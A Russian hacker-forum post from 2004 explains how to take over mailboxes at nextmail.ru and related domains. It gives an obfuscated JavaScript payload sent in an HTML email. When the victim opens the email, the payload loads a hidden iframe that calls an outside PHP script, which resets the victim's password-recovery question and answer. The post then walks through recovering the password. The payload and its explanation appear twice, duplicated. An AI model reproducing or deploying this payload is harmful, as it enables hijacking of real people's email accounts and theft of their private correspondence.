JazzzSummerMan
20.06.2004, 04:06
Да.. снова о взломе почты. Старым добрым проверенным способом. Кому-то может быть и надоело, но слишком часто встречаюца мне в последнее время такие "чудесные" творения веб-мастеров, и кому-то может будет даже интересно. Короче <span style='color:green'>http://nextmail.ru(xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru)</span>, об этой почте и пойдет речь. Заводим ящик на рамблер.ру, пишем письмо на адрес zlodey@nextmail.ru, в тело письма копируем:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#1 16&#58document.getElementById('xxx').innerHTML='<& #105&#102&#114&#97&#109&#101 src=http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0>
<span id=xxx></span>[/QUOTE]<span id='postcolor'>
Перед отправкой ставим флажок "в виде хтмл"(чем мне и нравицца собственно рамблер). Злодей читает письмо, срабатывает наш скрипт(удивительно, но JS проходит почти любым способом, при том при всем, что в настройках ящика по умолчнию стоит повышенная безопасность, типа от всяких вредоносных скриптов)) скриптзначит срабатывает, прописывается <iframe>, вызывается пхп http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y (http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y) , меняются: вопрос на X, ответ на Y.
Ну а дальше все понтно. Кстати оченб приятный интерфейс напоминания пароля)) Вводишь мыло, задается вопрос, вводишь ответ - и парольчик прямо тут и выдается) быстро и качественно, как говориться гыгы
Скрипт pochta.php не привожу, подобный уже был описан во взломе форум.хакер.ру
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#1 16&#58document.getElementById('xxx').innerHTML='<& #105&#102&#114&#97&#109&#101 src=http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0>
<span id=xxx></span>[/QUOTE]<span id='postcolor'>
Перед отправкой ставим флажок "в виде хтмл"(чем мне и нравицца собственно рамблер). Злодей читает письмо, срабатывает наш скрипт(удивительно, но JS проходит почти любым способом, при том при всем, что в настройках ящика по умолчнию стоит повышенная безопасность, типа от всяких вредоносных скриптов)) скриптзначит срабатывает, прописывается <iframe>, вызывается пхп http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y (http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y) , меняются: вопрос на X, ответ на Y.
Ну а дальше все понтно. Кстати оченб приятный интерфейс напоминания пароля)) Вводишь мыло, задается вопрос, вводишь ответ - и парольчик прямо тут и выдается) быстро и качественно, как говориться гыгы
Скрипт pochta.php не привожу, подобный уже был описан во взломе форум.хакер.ру